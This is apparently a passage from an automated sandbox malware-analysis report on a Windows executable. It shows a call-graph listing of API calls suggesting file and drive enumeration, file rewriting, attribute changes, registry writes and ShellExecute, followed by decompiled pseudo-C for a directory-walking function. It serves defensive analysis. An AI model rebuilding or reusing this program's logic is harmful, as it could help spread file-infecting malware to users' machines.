9780->9807 9782->9762 9785 40147a 9783->9785 9784 4014aa 9784->9773 9785->9784 9786 401496 VirtualAlloc 9785->9786 9786->9784 9786->9785 9788 4012af VirtualAlloc 9787->9788 9790 4012dc 9788->9790 9791 4012ff 9788->9791 9792 401154 LocalAlloc 9790->9792 9791->9772 9793 4012e8 9792->9793 9793->9791 9794 4012ec VirtualFree 9793->9794 9794->9791 9796 4011b8 9795->9796 9797 401154 LocalAlloc 9796->9797 9798 4011fe 9797->9798 9798->9772 9802 4013ab 9799->9802 9800 401404 9800->9773 9801 4013d8 VirtualFree 9801->9802 9802->9800 9802->9801 9804 401c2e 9803->9804 9805 401c25 9803->9805 9804->9779 9805->9804 9806 4019f0 9 API calls 9805->9806 9806->9804 9808 4019dd 9807->9808 9809 4019ce 9807->9809 9808->9782 9810 401b94 9 API calls 9809->9810 9811 4019db 9810->9811 9811->9782 9814 401afa 9812->9814 9813 401b82 9813->9764 9814->9813 9815 401b25 9814->9815 9816 401b39 9814->9816 9825 4016fc 9815->9825 9818 4016fc 3 API calls 9816->9818 9819 401b37 9818->9819 9819->9813 9820 4019c0 9 API calls 9819->9820 9821 401b5d 9820->9821 9822 401b77 9821->9822 9835 401a14 9821->9835 9840 40120c 9822->9840 9826 401722 9825->9826 9834 40177b 9825->9834 9827 4014c8 VirtualFree 9826->9827 9828 40172f 9827->9828 9829 40119c LocalAlloc 9828->9829 9830 40173f 9829->9830 9831 40137c VirtualFree 9830->9831 9832 401756 9830->9832 9831->9832 9833 40120c LocalAlloc 9832->9833 9832->9834 9833->9834 9834->9819 9836 401a27 9835->9836 9837 401a19 9835->9837 9836->9822 9838 4019f0 9 API calls 9837->9838 9839 401a26 9838->9839 9839->9822 9841 401217 9840->9841 9842 401232 9841->9842 9843 401154 LocalAlloc 9841->9843 9842->9813 9843->9842 9845 403ed7 9844->9845 9846 403efd TlsGetValue 9844->9846 9845->9741 9847 403ee2 9846->9847 9848 403f07 9846->9848 9855 403e84 9847->9855 9848->9741 9850 403ee7 TlsGetValue 9851 403ef6 9850->9851 9851->9741 9862 40307c 9852->9862 9857 403e8a 9855->9857 9860 403eae 9857->9860 9861 403e70 LocalAlloc 9857->9861 9858 403eaa 9859 403eba TlsSetValue 9858->9859 9858->9860 9859->9860 9860->9850 9861->9858 9865 402fa4 9862->9865 9866 402fbd 9865->9866 9868 402fe6 9866->9868 9872 402f18 9866->9872 9869 403028 FreeLibrary 9868->9869 9870 40304c ExitProcess 9868->9870 9869->9868 9873 402f22 GetStdHandle WriteFile GetStdHandle WriteFile 9872->9873 9874 402f79 9872->9874 9873->9868 9875 402f82 MessageBoxA 9874->9875 9876 402f95 9874->9876 9875->9876 9876->9868 9879 402480 9878->9879 9880 40246d 9878->9880 9879->9704 9880->9879 9881 402530 11 API calls 9880->9881 9881->9879 9883 403158 25 API calls 9882->9883 9885 403194 9883->9885 9884 403094 11 API calls 9886 4031ac 9884->9886 9885->9884 9886->9533 9888 403496 9887->9888 9889 403469 9887->9889 9890 403094 11 API calls 9888->9890 9889->9888 9892 40347d 9889->9892 9891 40348c 9890->9891 9891->9539 9893 403184 25 API calls 9892->9893 9893->9891 9895 4031c4 25 API calls 9894->9895 9896 40504c 9895->9896 9942 404db8 9896->9942 9899 403094 11 API calls 9900 405071 9899->9900 9900->9547 9902 403257 9901->9902 9903 403218 9901->9903 9902->9549 9904 403222 9903->9904 9905 4030e8 9903->9905 9906 403235 9904->9906 9907 40324c 9904->9907 9911 403158 25 API calls 9905->9911 9912 4030fc 9905->9912 9963 403534 9906->9963 9909 403534 25 API calls 9907->9909 9914 40323a 9909->9914 9910 40312a 9910->9549 9911->9912 9912->9910 9913 402468 11 API calls 9912->9913 9913->9910 9914->9549 9916 404df5 9915->9916 9931 404e7a 9916->9931 9969 404dcc 9916->9969 9919 4030b8 11 API calls 9921 404e9e 9919->9921 9921->9552 9922 404e2a 9922->9931 9976 404cf8 GetFileAttributesA 9922->9976 9926 404e4e 9927 404eec 25 API calls 9926->9927 9926->9931 9928 404e66 9927->9928 9929 404de0 27 API calls 9928->9929 9930 404e6e 9929->9930 9930->9931 9982 404eb0 9930->9982 9931->9919 9934 4032dd 9933->9934 9935 403303 9934->9935 9936 40331a 9934->9936 9937 403534 25 API calls 9935->9937 9938 403158 25 API calls 9936->9938 9940 403310 9937->9940 9938->9940 9939 40334b 9940->9939 9941 4030e8 25 API calls 9940->9941 9941->9939 9945 404d48 9942->9945 9954 4030e8 9945->9954 9947 404d6d 9950 404d95 9947->9950 9960 4031b4 9947->9960 9952 403094 11 API calls 9950->9952 9951 403214 25 API calls 9951->9950 9953 404daa 9952->9953 9953->9899 9955 4030ec 9954->9955 9956 4030fc 9954->9956 9955->9956 9958 403158 25 API calls 9955->9958 9957 40312a 9956->9957 9959 402468 11 API calls 9956->9959 9957->9947 9958->9956 9959->9957 9961 403184 25 API calls 9960->9961 9962 4031c1 9961->9962 9962->9951 9965 403541 9963->9965 9968 403571 9963->9968 9964 403094 11 API calls 9967 40354d 9964->9967 9966 403158 25 API calls 9965->9966 9965->9967 9966->9968 9967->9914 9968->9964 9985 404d08 9969->9985 9972 40312c 9974 403130 9972->9974 9973 403154 9973->9922 9974->9973 9975 402468 11 API calls 9974->9975 9975->9973 9977 404d01 9976->9977 9977->9931 9978 404eec 9977->9978 9979 404ef8 9978->9979 9980 403184 25 API calls 9979->9980 9981 404f11 9980->9981 9981->9926 10001 40340c 9982->10001 9986 4030e8 25 API calls 9985->9986 9987 404d1a 9986->9987 9988 404d43 9987->9988 9990 4034a4 9987->9990 9988->9972 9995 40345c 9990->9995 9992 4034e8 9992->9988 9993 4034b2 9993->9992 9994 403534 25 API calls 9993->9994 9994->9992 9996 403418 9995->9996 9997 403453 9996->9997 9998 403158 25 API calls 9996->9998 9997->9993 9999 40342f 9998->9999 9999->9997 10000 402468 11 API calls 9999->10000 10000->9997 10002 403410 CreateDirectoryA 10001->10002 10002->9931 10004 4031c4 25 API calls 10003->10004 10005 404fd4 10004->10005 10006 404db8 25 API calls 10005->10006 10007 404fe1 10006->10007 10008 403094 11 API calls 10007->10008 10009 404ff9 10008->10009 10009->9577 10110 404490 10010->10110 10013 404baa 10013->9582 10013->9583 10112 4044f8 10014->10112 10018 404b68 CreateFileA 10017->10018 10019 405e10 10018->10019 10020 405e13 GetFileSize 10019->10020 10030 405e4a 10019->10030 10021 403184 25 API calls 10020->10021 10022 405e2a 10021->10022 10023 404bc4 ReadFile 10022->10023 10024 405e34 10023->10024 10121 404b90 CloseHandle 10024->10121 10026 405e3a 10122 405e94 10026->10122 10028 405e45 10132 4044a8 10028->10132 10030->9593 10032 405cfe 10031->10032 10033 402468 11 API calls 10032->10033 10034 405d16 10032->10034 10033->10034 10034->9593 10036 4071d9 10035->10036 10037 406fe4 25 API calls 10036->10037 10038 407249 10037->10038 10039 407466 10038->10039 10144 404f34 10038->10144 10042 4030b8 11 API calls 10039->10042 10044 407483 10042->10044 10043 40312c 11 API calls 10046 40726d 10043->10046 10045 403094 11 API calls 10044->10045 10048 40748b 10045->10048 10047 404f90 26 API calls 10046->10047 10049 407278 10047->10049 10048->9604 10049->10039 10050 405008 26 API calls 10049->10050 10051 4072a9 10050->10051 10051->10039 10052 404f6c 2 API calls 10051->10052 10053 4072e3 10052->10053 10053->10039 10054 407130 15 API calls 10053->10054 10055 407301 10054->10055 10055->10039 10056 407315 GetFileAttributesA 10055->10056 10057 407327 SetFileAttributesA 10056->10057 10058 40732f 10056->10058 10057->10058 10149 405bdc 10058->10149 10066 407352 10067 404b68 CreateFileA 10066->10067 10068 407399 10067->10068 10069 407448 10068->10069 10070 404bc4 ReadFile 10068->10070 10170 404b90 CloseHandle 10069->10170 10072 4073b6 10070->10072 10072->10069 10165 404bb4 SetFilePointer 10072->10165 10073 40744f 10073->10039 10074 407457 10073->10074 10076 407460 SetFileAttributesA 10074->10076 10076->10039 10077 4073d7 10078 404bc4 ReadFile 10077->10078 10079 4073e9 10078->10079 10166 404bb4 SetFilePointer 10079->10166 10081 40741a 10167 404be0 WriteFile 10081->10167 10085 407436 10086 404be0 WriteFile 10085->10086 10086->10069 10088 407145 10087->10088 10089 404b68 CreateFileA 10088->10089 10090 407160 10089->10090 10091 407167 10090->10091 10370 404bb4 SetFilePointer 10090->10370 10094 403094 11 API calls 10091->10094 10093 407179 10095 404bc4 ReadFile 10093->10095 10096 4071be 10094->10096 10097 40718b 10095->10097 10096->9604 10371 404b90 CloseHandle 10097->10371 10100 404b68 CreateFileA 10099->10100 10101 405e5d 10100->10101 10109 405e8e 10101->10109 10372 405d30 10101->10372 10103 405e6c 10104 404be0 WriteFile 10103->10104 10105 405e7d SetEndOfFile 10104->10105 10376 404b90 CloseHandle 10105->10376 10107 405e89 10108 4044a8 11 API calls 10107->10108 10108->10109 10109->9606 10111 404494 GetFileAttributesA 10110->10111 10111->10013 10115 4027a0 10112->10115 10114 4044fd 10114->9588 10116 4027a5 10115->10116 10117 4027a6 10115->10117 10116->10114 10118 4027e7 10117->10118 10119 402448 25 API calls 10117->10119 10118->10114 10120 4027b8 10119->10120 10120->10114 10121->10026 10123 405e98 10122->10123 10125 405e9e 10122->10125 10135 405cbc 10123->10135 10126 402448 25 API calls 10125->10126 10131 405f12 10125->10131 10128 405ec2 10126->10128 10127 405ef4 10127->10131 10141 40456c 10127->10141 10128->10127 10130 402468 11 API calls 10128->10130 10130->10127 10131->10028 10133 403094 11 API calls 10132->10133 10134 4044b4 10133->10134 10134->10030 10139 405cc1 10135->10139 10136 405cec 11 API calls 10136->10139 10137 405ce0 10137->10125 10138 405ccf 10138->10137 10140 402468 11 API calls 10138->10140 10139->10136 10139->10138 10140->10137 10142 4044f8 25 API calls 10141->10142 10143 404579 10142->10143 10143->10131 10145 40340c 10144->10145 10146 404f51 GetShortPathNameA 10145->10146 10147 403184 25 API calls 10146->10147 10148 404f62 10147->10148 10148->10043 10171 4059a8 10149->10171 10151 405be6 10152 4064cc 10151->10152 10153 4044f8 25 API calls 10152->10153 10154 4064d9 10153->10154 10155 406ca8 10154->10155 10174 4064e4 10155->10174 10157 406cb8 10158 406cc0 ExtractIconA 10157->10158 10159 406cd1 10158->10159 10160 406cd9 10158->10160 10178 406520 10159->10178 10162 406510 10160->10162 10187 406b48 10162->10187 10165->10077 10166->10081 10168 404bf4 10167->10168 10169 404bb4 SetFilePointer 10168->10169 10169->10085 10170->10073 10172 4044f8 25 API calls 10171->10172 10173 4059b9 10172->10173 10173->10151 10175 4064f9 10174->10175 10176 4064eb 10174->10176 10175->10157 10176->10175 10177 4064f1 DestroyCursor 10176->10177 10177->10175 10179 406579 10178->10179 10180 40652e 10178->10180 10179->10160 10181 4064e4 DestroyCursor 10180->10181 10182 406535 10181->10182 10182->10179 10183 40653e GetIconInfo GetObjectA 10182->10183 10184 406565 DeleteObject 10183->10184 10185 40656b 10183->10185 10184->10185 10185->10179 10186 406573 DeleteObject 10185->10186 10186->10179 10192 406b74 10187->10192 10188 406c7b 10228 403b30 10188->10228 10192->10188 10199 403b24 10192->10199 10193 406c26 10202 406638 10193->10202 10195 406bf6 GetIconInfo 10195->10193 10195->10195 10197 406c3b 10197->10188 10198 406c6f DeleteObject 10197->10198 10198->10197 10234 403998 10199->10234 10203 406665 10202->10203 10204 40456c 25 API calls 10203->10204 10218 40685a 10203->10218 10205 406697 10204->10205 10298 405fd8 10205->10298 10208 405fd8 28 API calls 10217 4066af 10208->10217 10209 4066f3 GetObjectA 10211 406715 GetObjectA 10209->10211 10209->10217 10210 4068b1 GetObjectA 10227 406877 10210->10227 10211->10217 10212 406748 CopyImage 10303 4061e0 10212->10303 10214 406761 10308 406154 10214->10308 10217->10209 10217->10212 10217->10218 10219 406218 71 API calls 10217->10219 10217->10227 10218->10197 10219->10217 10220 406970 CopyImage 10223 4061e0 13 API calls 10220->10223 10221 4069f4 CopyImage 10222 4061e0 13 API calls 10221->10222 10222->10227 10223->10227 10224 406a89 CopyImage 10225 4061e0 13 API calls 10224->10225 10225->10227 10226 406218 71 API calls 10226->10227 10227->10210 10227->10218 10227->10220 10227->10221 10227->10224 10227->10226 10229 403b68 10228->10229 10231 403b36 10228->10231 10229->10066 10230 403b60 10232 402468 11 API calls 10230->10232 10231->10229 10231->10230 10329 40364c 10231->10329 10232->10229 10235 4039b7 10234->10235 10239 4039d1 10234->10239 10236 4039c2 10235->10236 10237 402530 11 API calls 10235->10237 10248 403990 10236->10248 10237->10236 10241 403a1b 10239->10241 10242 402530 11 API calls 10239->10242 10240 4039cc 10240->10193 10240->10195 10243 402448 25 API calls 10241->10243 10244 403a28 10241->10244 10242->10241 10245 403a67 10243->10245 10244->10240 10247 403998 29 API calls 10244->10247 10245->10244 10251 403978 10245->10251 10247->10244 10249 403b30 13 API calls 10248->10249 10250 403995 10249->10250 10250->10240 10254 40386c 10251->10254 10253 403983 10253->10244 10255 403881 10254->10255 10271 4038a7 10254->10271 10257 403886 10255->10257 10261 4038c9 10255->10261 10256 4030e8 25 API calls 10256->10271 10259 40388b 10257->10259 10260 4038dd 10257->10260 10263 403890 10259->10263 10264 4038f1 10259->10264 10267 4038c4 10260->10267 10280 403738 10260->10280 10261->10267 10273 4035dc 10261->10273 10265 403912 10263->10265 10266 403895 10263->10266 10264->10267 10268 40386c 29 API calls 10264->10268 10265->10267 10285 403750 10265->10285 10266->10267 10270 403943 10266->10270 10266->10271 10267->10253 10268->10264 10270->10267 10294 403b6c 10270->10294 10271->10256 10271->10267 10274 4035a0 10273->10274 10275 403598 10273->10275 10276 4035b4 10274->10276 10277 4035a6 SysFreeString 10274->10277 10275->10273 10275->10274 10278 4035ef SysReAllocStringLen 10275->10278 10276->10261 10277->10276 10278->10275 10279 4035ff 10278->10279 10279->10261 10281 403741 10280->10281 10282 403748 10280->10282 10281->10260 10283 402530 11 API calls 10282->10283 10284 40374f 10283->10284 10284->10260 10292 40376a 10285->10292 10286 4030e8 25 API calls 10286->10292 10287 4035dc 2 API calls 10287->10292 10288 403738 11 API calls 10288->10292 10289 403856 10289->10265 10290 40386c 29 API calls 10290->10292 10291 403750 29 API calls 10291->10292 10292->10286 10292->10287 10292->10288 10292->10289 10292->10290 10292->10291 10293 403b6c 13 API calls 10292->10293 10293->10292 10296 403b73 10294->10296 10295 403b8d 10295->10270 10296->10295 10297 403b30 13 API calls 10296->10297 10297->10295 10314 405fb4 10298->10314 10301 40600a 10301->10208 10302 405feb 72E7AC50 72E7A520 72E7B380 10302->10301 10317 406068 10303->10317 10306 406202 10306->10214 10307 4061ea GetObjectA 10307->10306 10309 406162 10308->10309 10310 406173 72E7AC50 72E7A7A0 72E7B380 10309->10310 10312 4061c2 GetObjectA 10309->10312 10311 4061a8 10310->10311 10310->10312 10311->10312 10313 402468 11 API calls 10311->10313 10312->10217 10313->10312 10315 4044f8 25 API calls 10314->10315 10316 405fc7 10315->10316 10316->10301 10316->10302 10318 40606e 10317->10318 10321 406024 10318->10321 10320 406075 10320->10306 10320->10307 10322 40602a 10321->10322 10323 406031 DeleteObject 10322->10323 10324 40603c 10322->10324 10323->10324 10325 406047 10324->10325 10326 402468 11 API calls 10324->10326 10327 402468 11 API calls 10325->10327 10328 406054 10325->10328 10326->10325 10327->10328 10328->10320 10330 403655 10329->10330 10349 40368a 10329->10349 10331 40366a 10330->10331 10332 40368f 10330->10332 10335 4036ac 10331->10335 10336 40366e 10331->10336 10333 4036a0 10332->10333 10334 403696 10332->10334 10340 4030b8 11 API calls 10333->10340 10339 403094 11 API calls 10334->10339 10341 4036b3 10335->10341 10342 4036ba 10335->10342 10337 403672 10336->10337 10338 4036c3 10336->10338 10343 4036d2 10337->10343 10344 403676 10337->10344 10338->10349 10361 403634 10338->10361 10339->10349 10340->10349 10354 4035a0 10341->10354 10357 4035b8 10342->10357 10343->10349 10350 40364c 13 API calls 10343->10350 10348 4036f0 10344->10348 10353 40367a 10344->10353 10348->10349 10366 403600 10348->10366 10349->10230 10350->10343 10352 403b30 13 API calls 10352->10353 10353->10349 10353->10352 10355 4035b4 10354->10355 10356 4035a6 SysFreeString 10354->10356 10355->10349 10356->10355 10358 4035be 10357->10358 10359 4035c4 SysFreeString 10358->10359 10360 4035d6 10358->10360 10359->10358 10360->10349 10362 403644 10361->10362 10363 40363d 10361->10363 10364 402530 11 API calls 10362->10364 10363->10338 10365 40364b 10364->10365 10365->10338 10367 403612 10366->10367 10368 40364c 13 API calls 10367->10368 10369 40362b 10367->10369 10368->10367 10369->10348 10370->10093 10371->10091 10374 405d3b 10372->10374 10373 403184 25 API calls 10375 405d5f 10373->10375 10374->10373 10375->10103 10376->10107 10378 404f24 10377->10378 10379 4031c4 25 API calls 10378->10379 10380 404f30 10379->10380 10381 404700 10380->10381 10382 4030e8 25 API calls 10381->10382 10383 404708 10382->10383 10384 40345c 25 API calls 10383->10384 10385 40470e 10384->10385 10385->9618 10387 40325c 10386->10387 10388 4032bd 10386->10388 10389 403264 10387->10389 10390 4030e8 10387->10390 10389->10388 10391 403273 10389->10391 10395 4030e8 25 API calls 10389->10395 10394 403158 25 API calls 10390->10394 10396 4030fc 10390->10396 10393 403158 25 API calls 10391->10393 10392 40312a 10392->9620 10398 40328d 10393->10398 10394->10396 10395->10391 10396->10392 10397 402468 11 API calls 10396->10397 10397->10392 10399 4030e8 25 API calls 10398->10399 10400 4032b9 10399->10400 10400->9620 10402 407bdd 10401->10402 10403 406fe4 25 API calls 10402->10403 10408 407c35 10403->10408 10404 407d6c 10405 403094 11 API calls 10404->10405 10406 407d84 10405->10406 10407 403094 11 API calls 10406->10407 10409 407d8c 10407->10409 10408->10404 10432 407ad0 10408->10432 10409->9629 10411 407c61 10412 407130 15 API calls 10411->10412 10413 407c69 10412->10413 10413->10404 10414 407c71 10413->10414 10415 407c79 GetFileAttributesA 10414->10415 10416 407c95 10415->10416 10417 407c8d SetFileAttributesA 10415->10417 10450 405b84 10416->10450 10417->10416 10419 407c9d 10419->9629 10421 406f5c 10420->10421 10422 403094 11 API calls 10420->10422 10423 404ae8 27 API calls 10421->10423 10422->10421 10426 406f75 10423->10426 10424 406fa0 10427 403534 25 API calls 10424->10427 10425 4049d0 27 API calls 10425->10426 10426->10424 10426->10425 10428 4032cc 25 API calls 10426->10428 10429 406fb1 10427->10429 10428->10426 10430 403094 11 API calls 10429->10430 10431 406fc6 10430->10431 10431->9635 10433 407ae6 10432->10433 10434 405c80 25 API calls 10433->10434 10435 407af9 10434->10435 10436 404f90 26 API calls 10435->10436 10437 407b12 10436->10437 10438 403214 25 API calls 10437->10438 10439 407b31 10438->10439 10440 405e04 29 API calls 10439->10440 10442 407b3c 10440->10442 10441 407b55 10443 404f90 26 API calls 10441->10443 10442->10441 10457 405cac 10442->10457 10445 407b5d 10443->10445 10446 403214 25 API calls 10445->10446 10447 407b7c 10446->10447 10448 405e50 29 API calls 10447->10448 10449 407b87 10448->10449 10449->10411 10451 4059a8 25 API calls 10450->10451 10452 405b93 10451->10452 10453 404b9c GetFileAttributesA 10452->10453 10454 405bb6 10453->10454 10455 404b68 CreateFileA 10454->10455 10456 405bd1 10455->10456 10456->10419 10460 405dc4 10457->10460 10459 405cb7 10459->10441 10461 405dcf 10460->10461 10463 405dd4 10460->10463 10462 40456c 25 API calls 10461->10462 10462->10463 10464 402448 25 API calls 10463->10464 10465 405de5 10464->10465 10465->10459 10467 4031c4 25 API calls 10466->10467 10468 404c27 10467->10468 10469 404b68 CreateFileA 10468->10469 10470 404c34 10469->10470 10471 404c50 10470->10471 10472 404be0 WriteFile 10470->10472 10474 403094 11 API calls 10471->10474 10473 404c47 10472->10473 10488 404b90 CloseHandle 10473->10488 10476 404c65 10474->10476 10476->9660 10478 40340c 10477->10478 10479 405772 RegOpenKeyExA 10478->10479 10480 40577d 10479->10480 10480->9663 10482 405799 10481->10482 10484 4057c0 10481->10484 10483 4057b5 RegSetValueExA 10482->10483 10483->10484 10485 4057cc 10484->10485 10486 4057d0 RegCloseKey 10485->10486 10487 4057d6 10485->10487 10486->10487 10487->9658 10488->10471 10490 405008 26 API calls 10489->10490 10491 406ebb 10490->10491 10492 403214 25 API calls 10491->10492 10493 406eda 10492->10493 10494 404c78 28 API calls 10493->10494 10495 406eef 10494->10495 10496 406ef3 10495->10496 10497 406f07 10495->10497 10534 4057d8 GetLocalTime 10496->10534 10499 4030b8 11 API calls 10497->10499 10501 406f21 10499->10501 10500 406ef8 10500->10497 10501->9672 10502->9676 10504 406dd5 10503->10504 10505 406de3 10504->10505 10506 406d79 GetDriveTypeA 10504->10506 10508 403094 11 API calls 10505->10508 10507 406d93 10506->10507 10507->10504 10510 4031b4 25 API calls 10507->10510 10511 403214 25 API calls 10507->10511 10509 406dfb 10508->10509 10509->9683 10510->10507 10511->10507 10513 4074cd 10512->10513 10536 4052ac 10513->10536 10515 407569 10517 4030b8 11 API calls 10515->10517 10516 4074fa 10516->10515 10519 405338 25 API calls 10516->10519 10520 403258 25 API calls 10516->10520 10521 4074b4 112 API calls 10516->10521 10522 4071d0 108 API calls 10516->10522 10518 40758a 10517->10518 10518->9683 10519->10516 10520->10516 10521->10516 10522->10516 10524 4057d8 GetLocalTime 10523->10524 10525 406e2d 10524->10525 10526 405008 26 API calls 10525->10526 10527 406e39 10526->10527 10528 403214 25 API calls 10527->10528 10529 406e58 10528->10529 10530 404bf8 28 API calls 10529->10530 10531 406e6d 10530->10531 10532 4030b8 11 API calls 10531->10532 10533 406e87 ReleaseMutex 10532->10533 10533->9671 10535 4057f0 10534->10535 10535->10500 10537 4044f8 25 API calls 10536->10537 10538 4052c3 10537->10538 10541 405634 10538->10541 10540 4052d1 10540->10516 10567 4052d8 10541->10567 10544 40456c 25 API calls 10545 405646 10544->10545 10546 4030e8 25 API calls 10545->10546 10547 405653 10546->10547 10548 404db8 25 API calls 10547->10548 10549 405746 10547->10549 10550 40566a 10548->10550 10549->10540 10552 405c80 25 API calls 10550->10552 10560 405699 10550->10560 10554 405676 10552->10554 10553 4056bc 10555 403258 25 API calls 10553->10555 10558 405cac 25 API calls 10554->10558 10556 4056ca 10555->10556 10557 4044a8 11 API calls 10556->10557 10559 4056cf FindFirstFileA 10557->10559 10558->10560 10561 403094 11 API calls 10559->10561 10571 405300 10560->10571 10566 4056e5 10561->10566 10563 405735 FindNextFileA 10564 405740 FindClose 10563->10564 10563->10566 10564->10549 10565 402448 25 API calls 10565->10566 10566->10549 10566->10563 10566->10565 10579 40536c 10566->10579 10568 4052e5 10567->10568 10569 4052df 10567->10569 10568->10544 10590 40458c 10569->10590 10572 4030e8 25 API calls 10571->10572 10576 403184 10572->10576 10573 405319 10573->10553 10574 403158 25 API calls 10575 403194 10574->10575 10577 403094 11 API calls 10575->10577 10576->10573 10576->10574 10578 4031ac 10577->10578 10578->10553 10582 4053ca 10579->10582 10580 4030b8 11 API calls 10581 405610 10580->10581 10581->10566 10583 4031c4 25 API calls 10582->10583 10587 405553 10582->10587 10588 405419 10582->10588 10583->10588 10584 4055a1 10585 4031c4 25 API calls 10584->10585 10584->10587 10585->10587 10586 4031c4 25 API calls 10586->10588 10587->10580 10588->10584 10588->10586 10588->10587 10589 404894 26 API calls 10588->10589 10589->10588 10591 4045ac 10590->10591 10593 404590 10590->10593 10591->10568 10592 402468 11 API calls 10592->10593 10593->10591 10593->10592 10594 4078a6 10595 4049d0 27 API calls 10594->10595 10596 4078b3 10595->10596 10597 404eec 25 API calls 10596->10597 10598 4078c4 10597->10598 10599 4078cf SetCurrentDirectoryA 10598->10599 10600 406f34 27 API calls 10599->10600 10601 4078e6 10600->10601 10602 405008 26 API calls 10601->10602 10603 4078fd 10602->10603 10604 4049d0 27 API calls 10603->10604 10605 40792b 10604->10605 10614 404ed0 10605->10614 10608 4032cc 25 API calls 10609 407952 10608->10609 10610 40795d ShellExecuteA 10609->10610 10611 40797b 10610->10611 10612 4030b8 11 API calls 10611->10612 10613 40798b 10612->10613 10615 404edd 10614->10615 10616 4031c4 25 API calls 10615->10616 10617 404eeb 10616->10617 10617->10608

                                                                          Executed Functions

                                                                          Function 00405634, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 251 405634-405659 call 4052d8 call 40456c call 4030e8 258 40574c-405759 call 404520 251->258 259 40565f-40566f call 404db8 251->259 264 405671-40568a call 405c80 call 4048d8 259->264 265 4056a9-4056e7 call 405300 call 403258 call 4044a8 FindFirstFileA call 403094 259->265 274 405691-405699 call 405cac 264->274 275 40568c 264->275 282 405746 265->282 283 4056e9-4056fc call 40536c 265->283 274->265 275->274 282->258 286 405735-40573e FindNextFileA 283->286 287 4056fe-405701 283->287 286->283 290 405740-405741 FindClose 286->290 288 405703-405713 287->288 289 405717-405730 call 402448 call 4045e8 call 40254c 287->289 288->286 294 405715 288->294 289->286 290->282 294->282 294->289
                                                                          C-Code - Quality: 60%
                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v292;
				char _v336;
				void* __ebx;
				void* __edi;
				void* __ebp;
				CHAR* _t38;
				void* _t39;
				int _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t60;
				void* _t63;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				struct _WIN32_FIND_DATAA* _t87;

				_t85 = __esi;
				_t70 = __edx;
				_t61 = __ecx;
				_t60 = __eax;
				asm("pushad");
				E004052D8(__eax);
				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
				asm("popad");
				asm("pushad");
				_t2 = _t60 + 0x1c; // 0x1c
				E004030E8(_t2, _t70);
				asm("popad");
				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
					asm("pushad");
					_t4 = _t60 + 0x1c; // 0x1c
					E00404DB8( *_t4, _t4);
					_t32 =  *((intOrPtr*)(_t60 + 0x20));
					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
						_t56 = E00405C80();
						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
						asm("popad");
						asm("pushad");
						_t57 = _t61;
						_t61 = _t56;
						_t58 = E004048D8(_t57, _t56, 0x40569b);
						_t82 = _t61;
						if(_t58 == 0) {
							_t82 = E004056A7;
						}
						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
					}
					asm("popad");
					_t87 = _t86 + 0xfffffec0;
					_push(0);
					_push(0);
					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
					_pop(_t63);
					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
					E004044A8();
					_t38 = _t63;
					_push(_t38);
					_t39 = FindFirstFileA(_t38, _t87); // executed
					_t84 = _t39;
					asm("pushfd");
					E00403094(_t87);
					asm("popfd");
					if(_t39 + 1 != 0) {
						do {
							if(E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4) != 0) {
								asm("jecxz 0x16");
								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
								asm("jecxz 0x22");
								asm("loop 0x31");
								_push(E00402448(0x140));
								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
								_pop(_t80);
								_t69 = 0x140;
								E0040254C(_t87, _t69, _t80);
							}
							_t45 = FindNextFileA(_t84, _t87); // executed
						} while (_t45 != 0);
						FindClose(_t84);
					}
				}
				 *((intOrPtr*)(_t60 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
			}

























                                                                          0x00405634
                                                                          0x00405634
                                                                          0x00405634
                                                                          0x00405639
                                                                          0x0040563b
                                                                          0x0040563c
                                                                          0x00405646
                                                                          0x00405649
                                                                          0x0040564a
                                                                          0x0040564b
                                                                          0x0040564e
                                                                          0x00405653
                                                                          0x00405659
                                                                          0x0040565f
                                                                          0x00405660
                                                                          0x00405665
                                                                          0x0040566a
                                                                          0x0040566f
                                                                          0x00405671
                                                                          0x00405676
                                                                          0x00405679
                                                                          0x0040567a
                                                                          0x0040567c
                                                                          0x0040567c
                                                                          0x00405682
                                                                          0x00405689
                                                                          0x0040568a
                                                                          0x0040568c
                                                                          0x0040568c
                                                                          0x00405694
                                                                          0x00405694
                                                                          0x004056a9
                                                                          0x004056aa
                                                                          0x004056b2
                                                                          0x004056b3
                                                                          0x004056b7
                                                                          0x004056c3
                                                                          0x004056c5
                                                                          0x004056ca
                                                                          0x004056cf
                                                                          0x004056d2
                                                                          0x004056d5
                                                                          0x004056da
                                                                          0x004056df
                                                                          0x004056e0
                                                                          0x004056e5
                                                                          0x004056e7
                                                                          0x004056e9
                                                                          0x004056fc
                                                                          0x00405701
                                                                          0x0040570f
                                                                          0x00405713
                                                                          0x00405715
                                                                          0x00405722
                                                                          0x00405727
                                                                          0x0040572c
                                                                          0x0040572d
                                                                          0x00405730
                                                                          0x00405730
                                                                          0x00405737
                                                                          0x0040573c
                                                                          0x00405741
                                                                          0x00405741
                                                                          0x00405746
                                                                          0x0040574e
                                                                          0x00405759

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Strings
                                                                          Memory Dump Source
